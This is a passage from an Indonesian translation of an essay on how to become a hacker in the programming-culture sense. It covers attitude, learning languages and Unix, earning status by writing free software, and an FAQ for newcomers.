Anak-anak perlu dididik dan kejahatan harus dicegah. Seorang hacker bisa menerima beberapa jenis kekuasaan yang bertujuan sama dengan yang dia inginkan daripada menghabiskan waktunya dengan menuruti tujuan lainnya. Namun adakalanya perlu dilakukan tawar-menawar, jenis penyerahan diri pada kekuasaan tidak akan pernah mereka berikan.)Para penguasa identik dengan penyensoran dan kerahasiaan. Mereka tidak pernah mempercayai ketulusan kerja sama dan berbagi informasi – mereka hanya menyukai ‘kerja sama’ yang dapat mereka kendalikan. Jadi untuk berperilaku sebagai seorang hacker, anda harus mengembangkan suatu kebencian terhadap penyensoran, kerahasiaan, dan penggunaan kekerasan atau tipu daya guna menghindari tanggung jawab. Dan anda harus bersedia bertindak berdasarkan keyakinan tersebut.5. Sikap tidak menggantikan keahlian.Untuk menjadi seorang hacker, anda harus mengembangkan beberapa sikap ini. Tapi membatasi diri pada sebuah sikap tunggal tidak akan menjadikan anda seorang hacker, atau apapun yang menjadikan anda sebagai seorang atlet juara atau bintang tenar.
Menjadi seorang ahcker memerlukan kecerdasan, latihan, dedikasi dan kerja keras.Oleh karena itu, anda harus belajar mempercayai sikap dan menghormati keahlian setiap orang. Kaum hacker tidak akan membiarkan pecundang membuang-buang waktu mereka, namun mereka menghormati keahlian – terutama keahlian hacking, keahlian apapun adalah baik. Keahlian membutuhkan keterampilan yang hanya beberapa master yang mampu, dan keahlian membutuhkan kecakapan yang terkait dengan sikap mental dan penjiwaan yang terbaik.Jika anda menyukai keahlian, anda akan suka mengembangkan diri anda sendiri – kerja keras dan dedikasi menjadi suatu permainan yang menarik daripada membosankan. Dan itu merupakan hal terpenting guna menjadi seorang hacker.Keahlian Dasar HackingSikap hacker sangatlah penting, tetapi keahlian jauh lebih penting.
Sikap tidak untuk mengganti keahlian, ada beberapa tolok ukur keterampilan dasar tertentu yang harus anda miliki sebelum anda bermimpi menjadi seorang hacker.Tolok ukur ini senantiasa berubah seiring dengan perkembangan teknologi yang membutuhkan keterampilan baru yang membuat usang keterampilan lam. Sebagai contoh, dulu pemrograman bahasa mesin sangat diperlukan tanpa perlu mempelajar sesuatu yang berhubungan dengan HTML. Namun di kahir 1996 sangatlah penting untuk menyertakan keahlian dalam bidang berikut ini:1. Belajar cara memprogram.Tentu saja, ini merupakan keahlian dasar hacking. Tahun 1997 anda harus mutlak menguasai bahasa C (bukan hanya sekedar coba-coba belajar). Anda bukanlah seorang hacker atau programmer jika anda hanya mengetahui satu bahasa – anda perlu belajar cara berpikir mengenai masalah pemrograman secara umum, tidak tergantung pada satu bahasa pemrograman saja. Untuk menjadi seorang hacker sejati, anda harus mendapatkan petunjuk dimana anda dapat mempelajari bahasa baru selama berhari-hari dengan menghubungkan petunjuk terhadap apa yang telah anda ketahui. Maksudnya anda harus mempelajari beberapa bahasa pemrograman yang berbeda.Disamping C, anda harus mempelakari LISP dan Perl (kalau perlu Java). Disamping pentingnya bahasa pemrograman, yang setiap bahasa tersebut memiliki pendekatan berbeda, dan memberikan anda pelajaran yang sangat berharga.Saya tidak dapat memberikan petunjuk lengkap cara belajar pemrograman itu disini – membutuhkan keahlian yang kompleks.
Namun saya bisa memberitahukan anda bahwa buku dan kursus tidak akan melakukan segalanya (mungkin kebanyakan karena pemikiran terbaik oleh para hacker). Apa yang perlu dilakukan adalah (a) membaca code dan (b) menulis code.Belajar memprogram seperti belajar bahasa menulis bahasa asli. Cara terbaik untuk melakukan hal tersebut adalah membaca materi yang ditulis oleh para master dibidang masing-masing, menuliskan beberapa hal tentang diri anda, membaca lebih banyak, menulis lebih sedikit, membaca lebih banyak lagi, menulis lebih banyak… dan terus diulang-ulang hingga anda mulai menulis untuk mengembangkan dan mempertajam kemampuan sesuai dengan yang anda inginkan.Dahulu, menemukan code yang bagus untuk dibaca sangatlah sulit, karena beberapa program besar hanya menyediakan sumbernya untuk para calon hacker yang membaca dan bekerja dengannya. Kini semuanya telah berubah secara dramatis antara lain; software gratis, tool pemrograman gratis, dan sistem operasi gratis (semuanya menyediakan kode sumber, dan seluruhnya dibangun oleh kaum hacker) serta digunakan secara luas.2. Memperoleh, mempelajari, dan menjalankan UNIX secara gratis.
Saya beranggapan anda telah memiliki personal computer atau dapat mengaksesnya ditempat lain. Langkah pertama yang terpenting bagi para newbie guna mendapatkan keahlian hacker adalah mendapatkan copy Linux atau salah satunya yakni free BSD-Unix, install pada komputer anda dan jalankan.Ya, ada beberapa sistem operasi lainnya selain Unix. Namun mereka terdistribusi dalam biner (terkompilasi) – anda tidak dapat membaca code tersebut, dan anda tidak dapat memodifikasinya. Mencoba belajar menghack melalui DOS atau Windows atau MacOS seperti sama halnya belajar menari dengan tubuh terikat.Selain Unix sebagai sistem operasi di Internet. Anda bisa saja belajar menggunakan Internet tanpa perlu mengenal Unix, tetapi anda tidak dapat menjadi seorang hacker internet tanpa memahaminya. Untuk alasan inilah, budaya hacker saat ini sangat berfokus pada Unix. (Hal ini tidaklah selalu benar, karena beberapa hacker generasi lama tidak menyukainya, namun simbiosis antara Unix dan Internet menjadi cukup kuat yang bahkan Microsoft tidak mampu menggoyahkannya.)Jadi, pelajarilah Unix – saya sendiri menyukai Linux namun ada cara lainnya. Mempelajarinya. Menjalankannya. Bekerja dengannya. Menghubungkannya ke internet. Membaca kode-nya. Dan memodifikasi kodenya. Anda akan mendapatkan alat pemrograman yang lebih baik (termasuk C, Lisp, dan Perl) ketimbang sistem operasi Microsoft yang anda impikan, anda memperoleh kesenangan, dan anda mendapatkan lebih banyak ilmu ketimbang anda merealisasikan yang telah anda pelajari hingga anda menoleh kebelakang sebagai seorang master hacker.Untuk mempelajari Unix, lihat The Loginataka.Untuk mempelajari Linux, lihat Where To Get Linux.3. Belajar Cara Menggunakan World Wide Web dan Menulis HTMLBanyak hal dari budaya hacker yang membangun pekerjaan mereka diluar dari hal ini, membantu menjalankan pabrik, perkantoran dan universitas tanpa berpengaruh langsung pada kehidupan orang-orang awam. Web adalah satu pengecualian terbesar, mainan hacker yang berkilauan ini diakui telah mengubah dunia ketimbang politik. Untuk alasan tunggal inilah, anda harus belajar cara bekerja dengan Web.Hal ini tidak berarti mempelajari cara menggunakan browser (siapapun dapat melakukan hal itu), namun mempelajari cara menulis HTML, bahasanya Web. Jika anda tidak mengetahui cara memprogram, menulis HTML yang membantu anda belajar. Bangunlah sebuah website.Namun hanya memiliki sebuah website tidak lantas menjadikan anda cukup baik untuk menjadi hacker.
Web merupakan himpunan home page. Anda memerlukan petunjuk tentang dunia HTML, lihat The HTML Hell Page).Agar berguna, halaman anda harus memiliki isi (content) – harus menarik dan/atau bermanfaat bagi hacker lainnya.Status Budaya HackerSeperti kebanyakan budaya tanpa kemandirian ekonomi, hackerdom memiliki reputasi. Anda mencoba memecahkan masalah yang menarik, namun betapa menariknya mereka, dan apakah solusi anda benar-benar baik, adalah suatu hal yang memerlukan kemampuan teknis atau kepakaran yang diperlukan untuk menilai.Berdasarkan hal itu, saat anda melakukan permainan hacker, anda belajar menjaga skor utama anda melalui apa yang hacker lain pikirkan tentang keahlian anda (inilah mengapa anda tidak benar-benar menjadi seorang hacker hingga hacker lainnya secara konsisten menyebut anda sebagai hacker). Kenyataannya adalah image yang tidak jelas tentang hacking seperti pekerjaan mereka yang terkungkung; juga dengan larangan budaya hacker (sekarang berangsur-angsur memudar tapi masih berpotensi) terhadap pengakuan bahwa ego atau pengakuan dunia luar merupakan salah satu dari motivasi seseorang.Khususnya, hackerdom adalah apa yang para ahli antropologi sebagai budaya terikat. Anda mendapatkan status dan reputasi didalamnya dengan tidak dengan mendominasi orang lain, tidak mengandalkan kecantikan, tidak memiliki sesuatu yang orang lain inginkan, namun memberikan sesuatu yang lebih berharga.
Khususnya, memberikan waktu anda, kreatifitas anda, dan hasil dari kemampuan anda.Ada 5 hal mendasar yang bisa anda lakukan untuk dihormati oleh para hacker:1. Menulis Software Gratis Anda.Hal pertama (pada umumnya) adalah menulis program yang hacker lain anggap sangat menyenangkan dan bermanfaat, dan memberikan sumber program ke dunia hacker untuk digunakan.Hackerdom seperti kelompok manusia setengah dewa yang menulis sebagian besar, program hebat yang kita temui diseluruh dunia dan banyak digunakan oleh setiap orang.2. Membantu Menguji dan Mendebug Software Gratis.Mereka juga melayani orang-orang yang membuat dan mendebug software gratis. Dalam dunia yang tidak sempurna ini, kita tidak dapat menghindari sebagian besar waktu yang dihabiskan dalam pengembangan software adalah saat mendebug. Itulah mengapa penulis software gratis orang-orang berpikir untuk memberitahukan anda bahwa penguji beta yang baik (siapapun yang mengetahui cara menggambarkan gejalanya, dan bersedia menerapkan beberapa contoh rutin diagnosanya) merupakan hadiah paling berharga bagi mereka.
Bahkan orang ini bisa membuat perbedaan antara fase mendebug yang memakan waktu lama, mimpi buruk yang menakutkan dan orang itu mau bersusah-payah demi sesuatu yang berguna.Jika anda seorang newbie, cobalah mencari sebuah program yang masih dikembangkan, bahwa anda tertarik dengannya dan menjadi seorang penguji beta yang baik. Itulah sifat alami untuk membantu menguji program membantu mendebug-nya guna membantu mereka memodifikasi. Banyak hal yang dapat anda pelajari dalam hal ini, dan memberikan anda karma yang baik pada orang-orang yang anda bantu di kemudian hari.3. Publikasikan informasi yang berguna.Hal baik lainnya adalah mengumpulkan dan menyaring informasi yang berguna dan menarik pada halaman web atau dokumentasi seperti FAQ (Frequently Asked Question) dan tersedia untuk umum.Pemelihara sebagaian besar FAQ teknis juga mendapatkan kehormatan yang sama dengan penulis software gratis.4. Membantu menjaga kerja infrastruktur.
Budaya hacker (dan pengembangan mesin Internet dijalankan oleh para sukarelawan. Ada banyak kebutuhan namun kerja yang tidak glamour senantiasa dikerjakan – mengadministrasi mailing list, memoderasi newsgroup, memelihara situs arsip software yang besar, mengembangkan RFC dan standar teknis lainnya.Orang-orang yang melakukan hal ini layak mendapatkan kehormatan, karena setiap orang mengetahui pekerjaan ini memakan banyak waktu dan tenaga serta tidak banyak kesenangan yang didapat sebagaimana bermain-main dengan kode. Mereka telah menunjukkan dedikasinya.5. Melayani budaya hacker itu sendiri.Akhirnya, anda bisa melayani dan menyebarluaskan budaya itu sendiri (misalkan tentang cara terbaik untuk menjadi seorang hacker :-)).Ini bukanlah sesuatu yang harus anda lakukan telah anda menjadi terkenal dan melakukan 4 hal diatas.Budaya hacker tidak memiliki pemimpin, tepatnya, namun mereka memiliki pahlawan dan adat-istiadat turun menurun dan bahasa. Saat anda melakukan perjalanan yang cukup panjang, mungkin anda tumbuh disini. Waspadalah: para hacker tidak mempercayai egoisme dalam budaya mereka, jadi sejauh mata memandang, egoisme dikenal sangat berbahaya. Ketimbang berupaya untuk hal itu, anda harus menyadari urutan posisi anda sendiri dan menjadi teladan dan bersikap ramah mengenai status anda.
The Hacker/Nerd ConnectionBerlawanan dengan mitos terkenal, anda tidak harus menjadi seorang nerd untuk menjadi seorang hacker. Hal itu memang membantu, bagaimanapun juga, dan sebagian hacker adalah nerd yang sebenarnya. Menjadi seorang terkucil dari masyarakat membantu anda tetap terkonsentrasi pada hal yang benar-benar penting, seperti berpikir dan hacking.Untuk alasan inilah, sebagian hacker mengadopsi label ‘nerd’ dan bahkan menggunakan istilah lebih keras, yakni ‘geek’ sebagai badge kebanggaan mereka – inilah suatu cara menyatakan independensi mereka dari anggapan masyarakat awam. Lihat The Geek Page untuk pembahasan lebih lanjut.Jika anda bisa mengatur konsentrasi yang layak pada hacking untuk menjadi lebih baik dan masih memiliki kehidupan, itu sangat baik. Sekarang lebih mudah daripada saat saya masih menjadi seorang newbie; adat budayanya jauh lebih bersahabat terhadap techno-nerd. Ada beberapa orang yang menyatakan bahwa para hacker merupakan calon pacar/suami/istri yang berkualitas tinggi. Untuk informasi lebih jauh tentang hal ini silakan lihat Girl's Guide to Geek Guys.Jika anda tertarik pada hacking karena anda tidak memiliki penghidupan, tidak masalah juga – setidaknya anda tidak memiliki kesulitan dalam konsentrasi.
Mungkin anda akan mendapatkan jodoh, suatu hari nanti.Titik GayaSekali lagi, untuk menjadi seorang hacker, anda harus memiliki pola pikir seorang hacker. ada beberapa hal yang bisa anda lakukan saat anda tidak berada di depan komputer untuk membantu orang lain. Hal ini mungkin saja tidak berhubungan dengan hacking namun sebagian hacker melakukannya, dan merasa bahwa mereka memiliki ketertarikan di bidang yang sama.
Bacalah buku fiksi sains. Pergilah ke pertemuan fiksi sains (cara terbaik untuk berjumpa dengan hacker dan proto-hacker).
Study Zen, dan/atau mengambil seni beladiri. (disiplin jiwa sangatlah penting.)
Mengembangkan kemampuan bermain musik. Belajar mengapresiasikan jenis musik khusus. Belajar memainkan beberapa instrumen musik dengan baik, atau cara menyanyi.
Mengembangkan apresiasi anda dengan mengikuti kuis berhadiah.
Belajar menulis dalam bahasa asing dengan baik. (sejumlah hacker juga adalah seorang penulis buku.)Ada banyak hal yang harus anda lakukan, terutama adalah bahwa anda memiliki kapasitas sebagai seorang hacker. Mampu menggunakan kecakapan otak sebelah kiri dan kanannya adalah sangat penting (para hacker harus mampu berpikir secara logis dan bertindak tidak logis guna memecahkan masalah suatu waktu.)Akhirnya, beberapa hal yang tidak boleh dilakukan.
Jangan bertindak bodoh, membesar-besarkan user ID atau screen name.
Jangan mengobarkan kebencian di Usenet (atau ditempat lainnya)
Jangan menggelari diri anda sendiri sebagai ‘cyberpunk’, dan jangan membuang-buang waktu anda pada setiap orang.
Jangan memposting atau menulis email yang dipenuhi kesalahan eja dan tata bahasa yang buruk.Jangan menjadikan diri anda atau orang lain sebagai bahan ejekan. Para hacker memiliki ingatan yang panjang – yang mengakibatkan anda perlu waktu bertahun-tahun agar anda bisa diterima.Narasumber lainnyaTerjemahan dokumen ini tersedia dalam bahasa Prancis, Spanyol dan Jepang.Loginataka memiliki beberapa hal untuk disampaikan mengenai pelatihan dan sikap yang layak dari seorang Unix Hacker.Saya juga telah menulis mengenai A Brief History Of HackerdomPeter Seeback memelihara suatu Hacker FAQ yang luar biasa ini bagi para manager yang tidak memahami cara bergaul dengan hacker.Saya telah menulis sebuah paper, The Cathedral and the Bazaar, yang menjelaskan seluk beluk budaya Linux. Anda dapat menemukannya di halaman ini.Frequently Asked Questions (Pertanyaan yang seringkali diajukan)Q: Bersediakan anda mengajari saya cara melakukan Hack?Semenjak awal publikasi halaman ini, saya banyak mendapat permintaan dari orang mengenai “ajari saya semua tentang hacking”. Sayangnya, saya tidak memiliki waktu atau energi untuk melakukan hal ini; proyek hacking saya sendiri memerlukan 110% dari waktu saya.Bahkan bila saya melakukannya, hacking adalah suatu sikap dan keahlian yang pada dasarnya harus anda miliki untuk mengajarkan diri anda sendiri.
Anda akan menjumpai bahwa saat seorang hacker sejati ingin membantu anda, mereka tidak akan menghormati anda jika anda meminta dengan menghiba-hiba segala sesuatu yang mereka ketahui.Pelajari beberapa hal untuk pertama kalinya. Tunjukkan bahwa anda telah mencoba, bahwa anda mampu belajar sendiri. Kemudian jumpailah seorang hacker dengan pertanyaan tersebut.Q: Dimana saya dapat berdialog dengan seorang hacker sejati?Baiklah, yang jelas bukan melalui IRC, saya yakin –- disana tidak ada satupun selain flamer dan cracker, sejauh yang saya ketahui. Cara terbaik adalah mencari suatu kelompok pengguna Linux atau Unix setempat untuk anda dan melakukan dialog dengan mereka (ada direktori halaman kelompok pengguna Linux di Sunsite).Q: Bahasa apa yang harus saya pelajari untuk pertama kali?HTML, jika anda tidak mengetahuinya. Ada banyak sumber, hype-HTML, buku panduan HMTL diluar sana, dan sebagainya. Salah satu yang terbaik adalah HTML: The Definitive Guide.Saat anda mulai melakukan pemrograman, saya sarankan memulainya dengan Perl atau Phython. C juga sangat penting, namun juga lebih sulit.Q: Bagaimana saya memulainya? Dimana saya bisa mendapatkan free UNIX?Disuatu tempat dihalaman ini saya sertakan petunjuk dimana mendapatkan Linux. Untuk menjadi seorang hacker anda perlu dorongan dan inisiatif dan kemampuan untuk mendidik diri anda sendiri. Mulailah sekarang…


Sumber : Wanchee100


ReadMore